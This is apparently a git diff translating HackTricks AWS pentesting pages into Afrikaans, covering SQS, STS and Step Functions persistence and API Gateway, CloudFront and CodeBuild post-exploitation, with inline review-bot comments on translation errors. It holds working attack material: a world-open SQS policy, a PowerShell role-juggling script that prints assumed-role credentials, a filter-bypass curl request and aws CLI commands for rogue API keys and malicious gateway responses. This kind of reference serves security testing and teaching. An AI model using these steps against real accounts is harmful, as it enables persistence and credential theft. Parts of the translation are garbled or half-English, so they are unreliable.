+--protocol http \ +--notification-endpoint http:/// \ +--topic-arn ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md index 88f396173..a09336ba7 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md 
@@ -1,43 +1,37 @@ -# AWS - SQS Persistence +# AWS - SQS Persistensie {{#include ../../../banners/hacktricks-training.md}} ## SQS -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-sqs-and-sns-enum.md {{#endref}} -### Using resource policy - -In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ -The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**: +### Gebruik van hulpbronbeleid +In SQS moet jy met 'n IAM-beleid **aangee wie toegang het om te lees en te skryf**. Dit is moontlik om eksterne rekeninge, ARN van rolle, of **selfs "\*"** aan te dui.\ +Die volgende beleid gee almal in AWS toegang tot alles in die wachtrij genaamd **MyTestQueue**: ```json { - "Version": "2008-10-17", - "Id": "__default_policy_ID", - "Statement": [ - { - "Sid": "__owner_statement", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": ["SQS:*"], - "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue" - } - ] +"Version": "2008-10-17", +"Id": "__default_policy_ID", +"Statement": [ +{ +"Sid": "__owner_statement", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": ["SQS:*"], +"Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue" +} +] } ``` - > [!NOTE] -> You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html) +> Jy kan selfs **'n Lambda in die aanvallers rekening aktiveer elke keer as 'n nuwe boodskap** in die waglyn geplaas word (jy sal dit op een of ander manier weer moet plaas). 
Volg hierdie instruksies: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md index c1b9a422b..c99c6f530 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md @@ -1,6 +1 @@ -# AWS - SSM Perssitence - - - - - +# AWS - SSM Persistensie diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md index 4e8c120ff..6ca9a8c06 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md 
@@ -1,25 +1,21 @@ -# AWS - Step Functions Persistence +# AWS - Stap Funksies Volharding {{#include ../../../banners/hacktricks-training.md}} -## Step Functions +## Stap Funksies -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-stepfunctions-enum.md {{#endref}} -### Step function Backdooring +### Stap funksie Agterdeur -Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps. +Agterdeur 'n stap funksie om dit te laat uitvoer enige volharding truuk sodat elke keer as dit uitgevoer word, dit jou kwaadwillige stappe sal uitvoer. -### Backdooring aliases +### Agterdeur aliase -If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function. +As die AWS-rekening aliase gebruik om stap funksies aan te roep, sal dit moontlik wees om 'n alias te wysig om 'n nuwe agterdeur weergawe van die stap funksie te gebruik. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md index 74db04bec..bb544ad9a 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md @@ -1,65 +1,62 @@ -# AWS - STS Persistence +# AWS - STS Persistensie {{#include ../../../banners/hacktricks-training.md}} ## STS -For more information access: +Vir meer inligting, toegang: {{#ref}} ../aws-services/aws-sts-enum.md {{#endref}} -### Assume role token +### Neem rol token -Temporary tokens cannot be listed, so maintaining an active temporary token is a way to maintain persistence. +Tydelike tokens kan nie gelys word nie, so om 'n aktiewe tydelike token te handhaaf is 'n manier om persistensie te handhaaf.
aws sts get-session-token --duration-seconds 129600
 
-# With MFA
+# Met MFA
 aws sts get-session-token \
-    --serial-number <mfa-device-name> \
-    --token-code <code-from-token>
+--serial-number <mfa-device-name> \
+--token-code <code-from-token>
 
-# Hardware device name is usually the number from the back of the device, such as GAHT12345678
-# SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username
-# Vritual device name is the ARN in AWS, such as arn:aws:iam::123456789012:mfa/username
+# Hardeware toestelnaam is gewoonlik die nommer van die agterkant van die toestel, soos GAHT12345678
+# SMS toestelnaam is die ARN in AWS, soos arn:aws:iam::123456789012:sms-mfa/gebruikersnaam
+# Virtuele toestelnaam is die ARN in AWS, soos arn:aws:iam::123456789012:mfa/gebruikersnaam
 
-### Role Chain Juggling +### Rolketting Juggling -[**Role chaining is an acknowledged AWS feature**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), often utilized for maintaining stealth persistence. It involves the ability to **assume a role which then assumes another**, potentially reverting to the initial role in a **cyclical manner**. Each time a role is assumed, the credentials' expiration field is refreshed. Consequently, if two roles are configured to mutually assume each other, this setup allows for the perpetual renewal of credentials. - -You can use this [**tool**](https://github.com/hotnops/AWSRoleJuggler/) to keep the role chaining going: +[**Rolketting is 'n erkende AWS kenmerk**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), wat dikwels gebruik word om stealth persistensie te handhaaf. Dit behels die vermoë om **'n rol aan te neem wat dan 'n ander aanneem**, wat moontlik terugkeer na die aanvanklike rol in 'n **sikliese manier**. Elke keer as 'n rol aangeneem word, word die vervaldatum van die geloofsbriewe verfris. Gevolglik, as twee rolle gekonfigureer is om mekaar wederkerig aan te neem, laat hierdie opstelling die perpetuele vernuwing van geloofsbriewe toe. +Jy kan hierdie [**instrument**](https://github.com/hotnops/AWSRoleJuggler/) gebruik om die rolketting aan die gang te hou: ```bash ./aws_role_juggler.py -h usage: aws_role_juggler.py [-h] [-r ROLE_LIST [ROLE_LIST ...]] optional arguments: - -h, --help show this help message and exit - -r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...] +-h, --help show this help message and exit +-r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...] 
``` - > [!CAUTION] -> Note that the [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured. +> Let daarop dat die [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) skrip van daardie Github-bewaarplek nie al die maniere vind waarop 'n rolketting gekonfigureer kan word nie.
-Code to perform Role Juggling from PowerShell - +Code om Rol Juggling vanaf PowerShell uit te voer ```powershell # PowerShell script to check for role juggling possibilities using AWS CLI # Check for AWS CLI installation if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) { - Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'." - exit +Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'." +exit } # Function to list IAM roles function List-IAMRoles { - aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json +aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json } # Initialize error count 
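Review bot: the caption for the PowerShell script in this hunk is only half translated, `+Code om Rol Juggling vanaf PowerShell uit te voer`: "Code" is the English word (Afrikaans "Kode"), and the heading `+### Rolketting Juggling` mixes the two languages the same way; suggest `Kode om rol-juggling vanaf PowerShell uit te voer` and one consistent rendering of "juggling" for the heading. The `aws_role_juggler.py -h` usage block in the same hunk also lost its leading whitespace (`+-h, --help show this help message and exit`), so the rendered help output no longer lines up as the tool prints it; the translation step should leave fenced code blocks exactly as they were.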
@@ -70,66 +67,61 @@ $roles = List-IAMRoles | ConvertFrom-Json # Attempt to assume each role foreach ($role in $roles) { - $sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) - try { - $credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json - if ($credentials) { - Write-Host "Successfully assumed role: $($role.RoleName)" - Write-Host "Access Key: $($credentials.AccessKeyId)" - Write-Host "Secret Access Key: $($credentials.SecretAccessKey)" - Write-Host "Session Token: $($credentials.SessionToken)" - Write-Host "Expiration: $($credentials.Expiration)" +$sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) +try { +$credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json +if ($credentials) { +Write-Host "Successfully assumed role: $($role.RoleName)" +Write-Host "Access Key: $($credentials.AccessKeyId)" +Write-Host "Secret Access Key: $($credentials.SecretAccessKey)" +Write-Host "Session Token: $($credentials.SessionToken)" +Write-Host "Expiration: $($credentials.Expiration)" - # Set temporary credentials to assume the next role - $env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId - $env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey - $env:AWS_SESSION_TOKEN = $credentials.SessionToken +# Set temporary credentials to assume the next role +$env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId +$env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey +$env:AWS_SESSION_TOKEN = $credentials.SessionToken - # Try to assume another role using the temporary credentials - foreach ($nextRole in $roles) { - if ($nextRole.Arn -ne $role.Arn) { - $nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) - try { - $nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 
2>$null | ConvertFrom-Json - if ($nextCredentials) { - Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)" - Write-Host "Access Key: $($nextCredentials.AccessKeyId)" - Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)" - Write-Host "Session Token: $($nextCredentials.SessionToken)" - Write-Host "Expiration: $($nextCredentials.Expiration)" - } - } catch { - $errorCount++ - } - } - } +# Try to assume another role using the temporary credentials +foreach ($nextRole in $roles) { +if ($nextRole.Arn -ne $role.Arn) { +$nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) +try { +$nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json +if ($nextCredentials) { +Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)" +Write-Host "Access Key: $($nextCredentials.AccessKeyId)" +Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)" +Write-Host "Session Token: $($nextCredentials.SessionToken)" +Write-Host "Expiration: $($nextCredentials.Expiration)" +} +} catch { +$errorCount++ +} +} +} - # Reset environment variables - Remove-Item Env:\AWS_ACCESS_KEY_ID - Remove-Item Env:\AWS_SECRET_ACCESS_KEY - Remove-Item Env:\AWS_SESSION_TOKEN - } else { - $errorCount++ - } - } catch { - $errorCount++ - } +# Reset environment variables +Remove-Item Env:\AWS_ACCESS_KEY_ID +Remove-Item Env:\AWS_SECRET_ACCESS_KEY +Remove-Item Env:\AWS_SESSION_TOKEN +} else { +$errorCount++ +} +} catch { +$errorCount++ +} } # Output the number of errors if any if ($errorCount -gt 0) { - Write-Host "$errorCount error(s) occurred during role assumption attempts." +Write-Host "$errorCount error(s) occurred during role assumption attempts." } else { - Write-Host "No errors occurred. All roles checked successfully." +Write-Host "No errors occurred. All roles checked successfully." 
} Write-Host "Role juggling check complete." ``` -
{{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md index 53f79d916..941a860e3 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md @@ -1,6 +1 @@ # AWS - Post Exploitation - - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md index 4847c40e0..1566692d8 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md 
@@ -4,48 +4,43 @@ ## API Gateway -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-api-gateway-enum.md {{#endref}} -### Access unexposed APIs +### Toegang tot nie-blootgestelde API's -You can create an endpoint in [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) with the service `com.amazonaws.us-east-1.execute-api`, expose the endpoint in a network where you have access (potentially via an EC2 machine) and assign a security group allowing all connections.\ -Then, from the EC2 machine you will be able to access the endpoint and therefore call the gateway API that wasn't exposed before. +Jy kan 'n eindpunt skep in [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) met die diens `com.amazonaws.us-east-1.execute-api`, die eindpunt blootstel in 'n netwerk waar jy toegang het (potensieel via 'n EC2 masjien) en 'n sekuriteitsgroep toewys wat alle verbindings toelaat.\ +Dan, vanaf die EC2 masjien sal jy in staat wees om toegang tot die eindpunt te verkry en dus die gateway API aan te roep wat voorheen nie blootgestel was nie. -### Bypass Request body passthrough +### Omseil Versoek liggaam deurlaat -This technique was found in [**this CTF writeup**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp). +Hierdie tegniek is gevind in [**hierdie CTF skrywe**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp). 
-As indicated in the [**AWS documentation**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) in the `PassthroughBehavior` section, by default, the value **`WHEN_NO_MATCH`** , when checking the **Content-Type** header of the request, will pass the request to the back end with no transformation. - -Therefore, in the CTF the API Gateway had an integration template that was **preventing the flag from being exfiltrated** in a response when a request was sent with `Content-Type: application/json`: +Soos aangedui in die [**AWS dokumentasie**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) in die `PassthroughBehavior` afdeling, is die waarde **`WHEN_NO_MATCH`** , wanneer die **Content-Type** kop van die versoek nagegaan word, sal die versoek na die agterkant deurgee sonder enige transformasie. +Daarom, in die CTF het die API Gateway 'n integrasiesjabloon gehad wat **die vlag verhinder het om uit te lek** in 'n antwoord wanneer 'n versoek gestuur is met `Content-Type: application/json`: ```yaml RequestTemplates: - application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}' +application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}' ``` - However, sending a request with **`Content-type: text/json`** would prevent that 
filter. Finally, as the API Gateway was only allowing `Get` and `Options`, it was possible to send an arbitrary dynamoDB query without any limit sending a POST request with the query in the body and using the header `X-HTTP-Method-Override: GET`: - ```bash curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json' --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}' ``` +### Gebruik Planne DoS -### Usage Plans DoS +In die **Enumerasie** afdeling kan jy sien hoe om die **gebruik plan** van die sleutels te **verkry**. As jy die sleutel het en dit is **beperk** tot X gebruike **per maand**, kan jy dit **net gebruik en 'n DoS veroorsaak**. -In the **Enumeration** section you can see how to **obtain the usage plan** of the keys. If you have the key and it's **limited** to X usages **per month**, you could **just use it and cause a DoS**. - -The **API Key** just need to be **included** inside a **HTTP header** called **`x-api-key`**. +Die **API Sleutel** moet net **ingesluit** wees in 'n **HTTP kop** genaamd **`x-api-key`**. ### `apigateway:UpdateGatewayResponse`, `apigateway:CreateDeployment` -An attacker with the permissions `apigateway:UpdateGatewayResponse` and `apigateway:CreateDeployment` can **modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts**. - +'n Aanvaller met die toestemmings `apigateway:UpdateGatewayResponse` en `apigateway:CreateDeployment` kan **'n bestaande Gateway Response wysig om pasgemaakte koppe of respons sjablone in te sluit wat sensitiewe inligting lek of kwaadwillige skripte uitvoer**. ```bash API_ID="your-api-id" RESPONSE_TYPE="DEFAULT_4XX" 
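Review bot: the paragraph beginning "However, sending a request with Content-type: text/json would prevent that filter" through "using the header X-HTTP-Method-Override: GET:" is still English in the translated file; it sits in this hunk as unchanged context between two translated paragraphs, so the Afrikaans page switches language mid-section, and it needs translating with the rest. In the same hunk the PassthroughBehavior sentence dropped "by default" and no longer reads as a sentence: "is die waarde WHEN_NO_MATCH , wanneer die Content-Type kop van die versoek nagegaan word, sal die versoek na die agterkant deurgee sonder enige transformasie". Suggest "is die verstekwaarde WHEN_NO_MATCH, wat na kontrole van die Content-Type kop die versoek sonder transformasie na die backend deurstuur"; "agterkant" (rear side) is the wrong word for "back end".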
@@ -56,16 +51,14 @@ aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RE # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources. +**Potensiële Impak**: Lek van sensitiewe inligting, uitvoering van kwaadwillige skripte, of ongemagtigde toegang tot API-hulpbronne. > [!NOTE] -> Need testing +> Nodig om te toets ### `apigateway:UpdateStage`, `apigateway:CreateDeployment` -An attacker with the permissions `apigateway:UpdateStage` and `apigateway:CreateDeployment` can **modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data**. - +'n Aanvaller met die regte `apigateway:UpdateStage` en `apigateway:CreateDeployment` kan **'n bestaande API Gateway-fase wysig om verkeer na 'n ander fase te herlei of die kasinstellings te verander om ongemagtigde toegang tot gekapte data te verkry**. ```bash API_ID="your-api-id" STAGE_NAME="Prod" 
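Review bot: "gekapte data" in this hunk (`+... ongemagtigde toegang tot gekapte data te verkry` and again in the impact line) means "chopped data"; for "cached data" use `gekasde data` or `data in die kas`. The admonition `+> Nodig om te toets` reads as "necessary in order to test" rather than "needs testing"; `> Moet nog getoets word` keeps the original meaning.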
@@ -76,16 +69,14 @@ aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --pat # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Unauthorized access to cached data, disrupting or intercepting API traffic. +**Potensiële Impak**: Onbevoegde toegang tot gekapte data, onderbreking of onderskepping van API-verkeer. > [!NOTE] -> Need testing +> Nodig om te toets ### `apigateway:PutMethodResponse`, `apigateway:CreateDeployment` -An attacker with the permissions `apigateway:PutMethodResponse` and `apigateway:CreateDeployment` can **modify the method response of an existing API Gateway REST API method to include custom headers or response templates that leak sensitive information or execute malicious scripts**. - +'n Aanvaller met die toestemmings `apigateway:PutMethodResponse` en `apigateway:CreateDeployment` kan **die metode-respons van 'n bestaande API Gateway REST API-metode wysig om pasgemaakte koptekste of respons-sjablone in te sluit wat sensitiewe inligting lek of kwaadwillige skripte uitvoer**. ```bash API_ID="your-api-id" RESOURCE_ID="your-resource-id" 
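Review bot: "header" is now rendered three ways in this file and this hunk adds the third: `+... pasgemaakte koptekste of respons-sjablone ...` here, `pasgemaakte koppe of respons sjablone` in the UpdateGatewayResponse section and `HTTP kop genaamd x-api-key` above it. Pick one term (`HTTP-koptekste` is the usual one) and settle `respons sjablone` vs `respons-sjablone` at the same time; `gekapte data` in the impact line has the same problem as in the previous hunk.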
@@ -98,16 +89,14 @@ aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources. +**Potensiële Impak**: Lek van sensitiewe inligting, uitvoering van kwaadwillige skripte, of ongemagtigde toegang tot API-hulpbronne. > [!NOTE] -> Need testing +> Nodig om te toets ### `apigateway:UpdateRestApi`, `apigateway:CreateDeployment` -An attacker with the permissions `apigateway:UpdateRestApi` and `apigateway:CreateDeployment` can **modify the API Gateway REST API settings to disable logging or change the minimum TLS version, potentially weakening the security of the API**. - +'n Aanvaller met die regte `apigateway:UpdateRestApi` en `apigateway:CreateDeployment` kan **die API Gateway REST API-instellings wysig om logging te deaktiveer of die minimum TLS-weergawe te verander, wat moontlik die sekuriteit van die API verzwak**. ```bash API_ID="your-api-id" 
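Review bot: `+... wat moontlik die sekuriteit van die API verzwak` uses the Dutch spelling; the Afrikaans form is `verswak`.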
@@ -117,16 +106,14 @@ aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=repla # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information. +**Potensiële Impak**: Verswakking van die sekuriteit van die API, wat moontlik ongeoorloofde toegang toelaat of sensitiewe inligting blootstel. > [!NOTE] -> Need testing +> Nodig om te toets ### `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, `apigateway:CreateUsagePlanKey` -An attacker with permissions `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, and `apigateway:CreateUsagePlanKey` can **create new API keys, associate them with usage plans, and then use these keys for unauthorized access to APIs**. - +'n Aanvaller met toestemmings `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, en `apigateway:CreateUsagePlanKey` kan **nuwe API-sleutels skep, dit met gebruiksplanne assosieer, en dan hierdie sleutels gebruik vir ongeoorloofde toegang tot API's**. ```bash # Create a new API key API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id') @@ -137,14 +124,9 @@ USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --outp # Associate the API key with the usage plan aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY ``` - -**Potential Impact**: Unauthorized access to API resources, bypassing security controls. +**Potensiële Impak**: Onbevoegde toegang tot API-hulpbronne, omseiling van sekuriteitsbeheer. > [!NOTE] -> Need testing +> Nodig om te toets {{#include ../../../banners/hacktricks-training.md}} - - - - 
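Review bot: "unauthorized" is translated three different ways in this file, and the two hunks here carry both of the newer variants: `+... wat moontlik ongeoorloofde toegang toelaat`, `+... hierdie sleutels gebruik vir ongeoorloofde toegang tot API's` and `+**Potensiële Impak**: Onbevoegde toegang tot API-hulpbronne ...`, while the earlier sections say `ongemagtigde toegang`. Settle on one (`ongemagtigde`) for the whole page.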
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md index 4a3c4ff21..cc5d53697 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md @@ -4,7 +4,7 @@ ## CloudFront -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-cloudfront-enum.md 
@@ -12,24 +12,20 @@ For more information check: ### Man-in-the-Middle -This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script). +Hierdie [**blogpos**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) stel 'n paar verskillende scenario's voor waar 'n **Lambda** bygevoeg (of gewysig indien dit reeds gebruik word) kan word in 'n **kommunikasie deur CloudFront** met die doel om **gebruikersinligting** (soos die sessie **cookie**) te **steel** en die **antwoord** te **wysig** (injecting 'n kwaadwillige JS-skrip). -#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket +#### scenario 1: MitM waar CloudFront geconfigureer is om toegang te verkry tot 'n HTML van 'n emmer -- **Create** the malicious **function**. -- **Associate** it with the CloudFront distribution. -- Set the **event type to "Viewer Response"**. +- **Skep** die kwaadwillige **funksie**. +- **Koppel** dit aan die CloudFront verspreiding. +- Stel die **gebeurtenistipe op "Viewer Response"**. -Accessing the response you could steal the users cookie and inject a malicious JS. +Deur die antwoord te benader, kan jy die gebruikers se cookie steel en 'n kwaadwillige JS injecteer. 
-#### scenario 2: MitM where CloudFront is already using a lambda function +#### scenario 2: MitM waar CloudFront reeds 'n lambda-funksie gebruik -- **Modify the code** of the lambda function to steal sensitive information +- **Wysig die kode** van die lambda-funksie om sensitiewe inligting te steel -You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main). +Jy kan die [**tf kode om hierdie scenario's hier te hercreëer**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main) nagaan. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md index 54be4e299..1c86452de 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md 
@@ -4,85 +4,73 @@ ## CodeBuild -For more information, check: +Vir meer inligting, kyk: {{#ref}} ../../aws-services/aws-codebuild-enum.md {{#endref}} -### Check Secrets +### Kontroleer Geheimen -If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\ -Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform. +As geloofsbriewe in Codebuild gestel is om met Github, Gitlab of Bitbucket te verbind in die vorm van persoonlike tokens, wagwoorde of OAuth-token toegang, **sal hierdie geloofsbriewe as geheimen in die geheimbestuurder gestoor word**.\ +Daarom, as jy toegang het om die geheimbestuurder te lees, sal jy in staat wees om hierdie geheimen te verkry en na die gekonnekteerde platform te pivot. {{#ref}} ../../aws-privilege-escalation/aws-secrets-manager-privesc.md {{#endref}} -### Abuse CodeBuild Repo Access +### Misbruik van CodeBuild Repo Toegang -In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code: +Om **CodeBuild** te konfigureer, sal dit **toegang tot die kode-repo** benodig wat dit gaan gebruik. Verskeie platforms kan hierdie kode aanbied:
-The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**. +Die **CodeBuild-projek moet toegang hĂȘ** tot die geconfigureerde bronverskaffer, hetsy via **IAM-rol** of met 'n github/bitbucket **token of OAuth-toegang**. -An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\ -In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you): +'n Aanvaller met **verhoogde regte oor 'n CodeBuild** kan hierdie geconfigureerde toegang misbruik om die kode van die geconfigureerde repo en ander waar die ingestelde geloofsbriewe toegang het, te lek.\ +Om dit te doen, sal 'n aanvaller net die **repo-URL na elke repo wat die konfigurasiegeloofsbriewe toegang het, moet verander** (let daarop dat die aws-webwerf al hulle vir jou sal lys):
